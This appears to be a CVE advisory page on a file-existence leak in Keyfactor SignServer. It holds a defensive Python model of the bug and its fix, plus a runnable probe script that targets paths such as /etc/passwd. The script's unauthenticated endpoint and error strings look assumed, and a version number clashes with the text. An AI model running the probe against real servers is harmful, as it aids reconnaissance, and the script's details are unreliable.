Security Vulnerability Report
CVE-2025-47220 CVSS 5.3 MEDIUM

CVE-2025-47220

Published: 2025-11-13 21:15:49
Last Modified: 2025-12-17 20:15:55

Description

A local file enumeration vulnerability was found in Keyfactor SignServer versions prior to 7.3.2. The property VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH, which exists in the PDFSigner and the PAdESSigner, can be set to any path without any restrictions by an admin user. If the provided path points to an existing file that is readable by the user running the application server but is not a recognized image format, this is returned as an error to the client side, confirming the existence of the file.
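The error-message oracle described above, next to a hardened loader, as an added example that is not SignServer code or the vendor's fix. It is a Python model of the pattern (SignServer itself is Java); the function names, error strings and the allowed-directory policy are assumptions made for illustration.

```python
import tempfile
from pathlib import Path

IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")  # PNG, JPEG, GIF
GENERIC_ERROR = "custom signature image could not be loaded"


def load_image_leaky(path):
    """Hypothetical model of the pre-fix pattern: any path, reason reported."""
    p = Path(path)
    if not p.is_file():
        raise ValueError("file not found")
    data = p.read_bytes()
    if not data.startswith(IMAGE_MAGIC):
        raise ValueError("not a recognized image format")  # confirms existence
    return data


def load_image_hardened(path, allowed_dir):
    """Hypothetical fix: confine path to allowed_dir, one error for all failures."""
    base = Path(allowed_dir).resolve()
    real = Path(path).resolve()  # collapses ../ and symlinks before the check
    try:
        data = real.read_bytes() if real.is_relative_to(base) else b""
    except OSError:
        data = b""
    if not data.startswith(IMAGE_MAGIC):
        raise ValueError(GENERIC_ERROR)
    return data


def error_for(loader, *args):
    try:
        loader(*args)
    except ValueError as exc:
        return str(exc)
    return None


def demo():
    """Client-visible errors for an existing and a missing non-image file."""
    with tempfile.TemporaryDirectory() as root:
        images = Path(root, "images")
        existing = Path(root, "app.conf")  # constructed sample file
        existing.write_text("key=value\n")
        missing = Path(root, "absent.conf")
        leaky = {error_for(load_image_leaky, p) for p in (existing, missing)}
        hardened = {error_for(load_image_hardened, p, images) for p in (existing, missing)}
    return leaky, hardened
```

`demo()` returns two distinct messages for the leaky loader and a single message for the hardened one, which is the property a reviewer should check for after upgrading.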

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:* - VULNERABLE
Keyfactor SignServer < 7.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# CVE-2025-47220 PoC - Local File Enumeration in Keyfactor SignServer
# Target: Keyfactor SignServer < 7.3.2
# Vulnerability: VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH allows arbitrary path specification


def check_file_existence(target_url, file_path):
    """
    Attempts to enumerate file existence by exploiting the
    VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH property vulnerability.

    Args:
        target_url: Base URL of the SignServer instance
        file_path: Path to check for existence

    Returns:
        bool: True if file exists, False otherwise; None if the request failed
    """
    # Endpoint for PDF signer configuration
    endpoint = f"{target_url}/signserver/pdfsigner"

    # Malicious parameter that triggers file enumeration
    payload = {
        'VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH': file_path,
        'workerName': 'PDFSigner'
    }

    try:
        response = requests.post(endpoint, data=payload, timeout=10)

        # Check for error messages indicating file existence.
        # If file exists but is not a valid image format, error is returned.
        # "file not found" / "does not exist" are not listed: they would
        # report a missing file as existing.
        error_indicators = [
            'not a valid image',
            'cannot read',
            'invalid format'
        ]

        response_text = response.text.lower()

        # If we get an error about image format, file exists
        for indicator in error_indicators:
            if indicator in response_text:
                return True

        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-47220.py <target_url> <file_path>")
        print("Example: python cve-2025-47220.py http://localhost:8080 /etc/passwd")
        sys.exit(1)

    target_url = sys.argv[1]
    file_path = sys.argv[2]

    print(f"[*] Checking file existence: {file_path}")
    result = check_file_existence(target_url, file_path)

    if result is True:
        print(f"[+] File EXISTS: {file_path}")
    elif result is False:
        print("[-] File does NOT exist or is not accessible")
    else:
        print("[!] Could not determine file status")


if __name__ == '__main__':
    main()

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47220", "sourceIdentifier": "[email protected]", "published": "2025-11-13T21:15:49.443", "lastModified": "2025-12-17T20:15:54.960", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local file enumeration was found in Keyfactor SignServer versions prior to 7.3.2 .The property VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH, which exists in the PDFSigner and the PAdESSigner, can be set to any path without any restrictions by an admin user. In the case that the provided path points to an existing file, readable by the user running the application server, but is not a recognized image format, it will return this as an error to the clientside, confirming the existences of the file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.3.1", "matchCriteriaId": "D27BE713-6FAA-452D-BDD4-784A8FEF0801"}]}]}], "references": [{"url": "https://docs.keyfactor.com/signserver/latest/signserver-7-3-release-notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://support.keyfactor.com", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://support.keyfactor.com/hc/en-us/articles/37638761131035-SignServer-CVE-2025-47220-Local-file-enumeration", "source": "[email protected]"}]}}